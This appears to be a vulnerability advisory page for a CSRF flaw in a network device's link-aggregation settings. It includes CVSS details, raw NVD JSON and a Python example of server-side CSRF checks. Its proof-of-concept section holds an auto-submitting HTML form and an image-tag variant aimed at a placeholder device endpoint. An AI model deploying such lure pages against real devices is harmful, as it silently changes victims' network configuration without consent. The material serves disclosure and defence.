Security Vulnerability Report
CVE-2026-22323 CVSS 7.1 HIGH

CVE-2026-22323

Published: 2026-03-18 08:16:31
Last Modified: 2026-04-27 19:22:09

Description

A CSRF vulnerability in the Link Aggregation configuration interface allows an unauthenticated remote attacker to trick authenticated users into sending unauthorized POST requests to the device by luring them to a malicious webpage. This can silently alter the device’s configuration without the victim’s knowledge or consent. Availability impact was set to low because after a successful attack the device will automatically recover without external intervention.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Network devices that support the Link Aggregation feature (firmware version not specified)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-22323 CSRF PoC - Link Aggregation Configuration -->
<!-- TARGET_IP and the CGI path/parameters are placeholders: the advisory does
     not name the affected endpoint, so they must be adapted to the device under test. -->
<html>
<body>
  <h2>CVE-2026-22323 CSRF PoC</h2>
  <p>Target: Network Device Link Aggregation Configuration</p>
  <form id="csrfForm" action="http://TARGET_IP/cgi-bin/lag_config.cgi" method="POST">
    <input type="hidden" name="action" value="modify" />
    <input type="hidden" name="lag_id" value="1" />
    <input type="hidden" name="members" value="port1,port2" />
    <input type="hidden" name="mode" value="lacp" />
    <input type="hidden" name="hash_key" value="" />
  </form>
  <script>
    // Auto-submit the form as soon as the lure page loads. The victim's browser
    // attaches its session cookie for TARGET_IP to this cross-site POST.
    document.getElementById('csrfForm').submit();
    console.log('CSRF request sent');
  </script>
  <p>If you see this, the attack may have failed.</p>
</body>
</html>

<!-- Alternative: image-based CSRF (for awareness). This variant issues a GET,
     so it only works if the endpoint also accepts GET; the advisory describes POST requests. -->
<img src="http://TARGET_IP/cgi-bin/lag_config.cgi?action=modify&lag_id=1&members=port1,port2" width="0" height="0" />
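The description and PoC above show the attack side. The following is an added example, written for this page and not taken from the advisory or the vendor's firmware, of the server-side checks a state-changing configuration handler such as the link-aggregation form needs in order to reject that PoC: refuse anything but POST, require an Origin (or Referer) that names the device itself, and require a per-session synchronizer token that a cross-site page cannot read. The device hostnames, session id, secret and the `csrf_token` field name are assumptions for illustration; the LAG form fields mirror the PoC.

```python
"""Server-side CSRF defence for a state-changing CGI handler.

Added example for this page, not the vendor's code. Hostnames, secret,
session id and the csrf_token field name are assumed for illustration.
"""
import hashlib
import hmac
from urllib.parse import urlsplit

# Hosts under which the device's own web UI is served (assumed for the example).
DEVICE_HOSTS = {"192.0.2.1", "switch.example.lan"}

# Constructed per-device secret. A real device generates this at first boot
# and never ships it inside the firmware image.
SESSION_SECRET = b"constructed-example-secret-do-not-reuse"


def issue_token(session_id, secret=SESSION_SECRET):
    """Synchronizer token bound to the session: HMAC(secret, session_id).
    The device embeds it as a hidden field in its own forms; an attacker's
    page cannot read it because of the same-origin policy."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_host(headers):
    """Hostname taken from Origin, falling back to Referer. Browsers attach
    Origin to cross-site form POSTs and do not let page script forge it."""
    lowered = {k.lower(): v for k, v in headers.items()}
    source = lowered.get("origin") or lowered.get("referer")
    if not source:
        return None
    return urlsplit(source).hostname


def csrf_safe(method, headers, form, session_id,
              secret=SESSION_SECRET, device_hosts=DEVICE_HOSTS):
    """Return True only if this state-changing request may be honoured."""
    if method.upper() != "POST":              # defeats the <img src=...> GET variant
        return False
    if _origin_host(headers) not in device_hosts:
        return False                          # cross-site, or no Origin/Referer at all
    expected = issue_token(session_id, secret)
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(expected, supplied)   # constant-time comparison


def demo():
    """Constructed requests: the PoC's cross-site POST, its GET image variant,
    a token from a different session, and a legitimate same-origin submit."""
    session = "sess-8c1f"                     # constructed session id
    lag_form = {"action": "modify", "lag_id": "1",
                "members": "port1,port2", "mode": "lacp", "hash_key": ""}

    requests = {
        "attacker_post": ("POST", {"Origin": "http://attacker.example",
                                   "Cookie": "sid=" + session}, lag_form),
        "attacker_get": ("GET", {"Referer": "http://attacker.example/lure.html"}, lag_form),
        "stale_token": ("POST", {"Origin": "http://192.0.2.1"},
                        {**lag_form, "csrf_token": issue_token("other-session")}),
        "legit": ("POST", {"Origin": "http://192.0.2.1"},
                  {**lag_form, "csrf_token": issue_token(session)}),
    }
    return {name: csrf_safe(method, headers, form, session)
            for name, (method, headers, form) in requests.items()}


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:14s} -> {'accepted' if allowed else 'rejected'}")
```

The two checks are independent on purpose: the Origin check alone fails when a device sits behind a proxy that rewrites headers or when a client omits both headers, and the token alone fails if the token ever leaks into a URL or log. Setting the session cookie with `SameSite=Lax` or `Strict` is a third, browser-enforced layer that stops the cookie from being attached to the PoC's cross-site POST at all, but the handler should not rely on the victim's browser for that.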

References

https://certvde.com/de/advisories/VDE-2025-104 (certvde.com advisory VDE-2025-104, the reference carried in the record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22323", "sourceIdentifier": "[email protected]", "published": "2026-03-18T08:16:30.513", "lastModified": "2026-04-27T19:22:08.623", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A CSRF vulnerability in the Link Aggregation configuration interface allows an unauthenticated remote attacker to trick authenticated users into sending unauthorized POST requests to the device by luring them to a malicious webpage. This can silently alter the device’s configuration without the victim’s knowledge or consent. Availability impact was set to low because after a successful attack the device will automatically recover without external intervention."}, {"lang": "es", "value": "Una vulnerabilidad CSRF en la interfaz de configuración de Agregación de Enlaces permite a un atacante remoto no autenticado engañar a usuarios autenticados para que envíen solicitudes POST no autorizadas al dispositivo atrayéndolos a una página web maliciosa. Esto puede alterar silenciosamente la configuración del dispositivo sin el conocimiento o consentimiento de la víctima. El impacto en la disponibilidad se estableció en bajo porque después de un ataque exitoso el dispositivo se recuperará automáticamente sin intervención externa."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-104", "source": "[email protected]"}]}}